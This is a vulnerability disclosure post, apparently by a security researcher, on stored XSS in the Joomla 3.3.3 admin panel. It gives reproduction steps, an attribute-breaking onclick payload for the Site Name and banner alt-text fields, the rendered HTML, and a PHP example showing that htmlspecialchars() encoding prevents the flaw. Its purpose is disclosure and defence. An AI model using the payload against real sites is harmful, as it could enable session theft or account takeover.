XSS Vulnerabilities on Joomla v3.3.3

Sent a report to the Joomla! strike team but have never received a response.
Seems like the vuln is not critical.
To trigger these XSS vulns you will need access to the administrative panel. Since the vulns are basically the same but are in different parameters, I'll be showing an example for just one.
1) Go to the Global Configuration page:
http://localhost/joomla/administrator/index.php?option=com_config
2) Type the following payload into “Site Name”:

" onclick=alert(1) test="

3) Save
4) On the admin page, if you click on the site logo or the site name, or on your main public page when you click on the site name, JavaScript will be executed.

<header class="header">
	<div class="container-logo">
		<img src="/joomla/administrator/templates/isis/images/logo.png" class="logo" alt="" onclick="alert(1)" test="">
		<span class="site-title" title="" onclick="alert(1)" test="">" onclick=alert(1) test="</span>
	</div>
	<a class="brand pull-left" href="/joomla">
		<span class="site-title" title="" onclick="alert(1)" test="">" onclick=alert(1) test="</span>
	</a>
	<div class="header-search pull-right">

There are many other parameters in the admin panel that are vulnerable. Another example would be the “Banner” page. Entering the exact same payload as the one above in the “Alternative Text” input box will also trigger JS when the banner is clicked. Web admins that allow staff to edit banners should be aware of this vuln, as it could lead to an account takeover or something more serious.
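The markup above comes from a stored value being written into a double-quoted attribute without encoding the quote character. The following is an added example, not Joomla's own code: the function names are hypothetical, and it contrasts unencoded output with `htmlspecialchars()` output, then parses both results to check whether the `span` gained attributes the template never wrote.

```php
<?php
// Added example, not Joomla's code. All function names are hypothetical.

// Constructed input: the "Site Name" value from step 2.
$siteName = '" onclick=alert(1) test="';

// Unencoded: the stored value is concatenated into the attribute and body.
function renderTitleRaw(string $name): string
{
    return '<span class="site-title" title="' . $name . '">' . $name . '</span>';
}

// Encoded: &, <, > and both quote characters become entities, so the
// value cannot close the title attribute or open a tag.
function renderTitleEncoded(string $name): string
{
    $e = htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
    return '<span class="site-title" title="' . $e . '">' . $e . '</span>';
}

// Parse the fragment with an HTML parser and list the span's attributes.
function spanAttributes(string $html): array
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // keep parser warnings out of the output
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    $names = [];
    foreach ($doc->getElementsByTagName('span')->item(0)->attributes as $attr) {
        $names[] = $attr->name;
    }
    return $names;
}

// Regression check: the template only ever writes class and title.
function hasInjectedAttributes(string $html): bool
{
    return array_diff(spanAttributes($html), ['class', 'title']) !== [];
}

foreach (['raw' => renderTitleRaw($siteName), 'encoded' => renderTitleEncoded($siteName)] as $label => $html) {
    printf("%-8s injected=%s attrs=[%s]\n", $label,
        var_export(hasInjectedAttributes($html), true),
        implode(', ', spanAttributes($html)));
}
```

The same check applies to any admin-editable field that ends up in an attribute, such as the banner “Alternative Text” value rendered into `alt`.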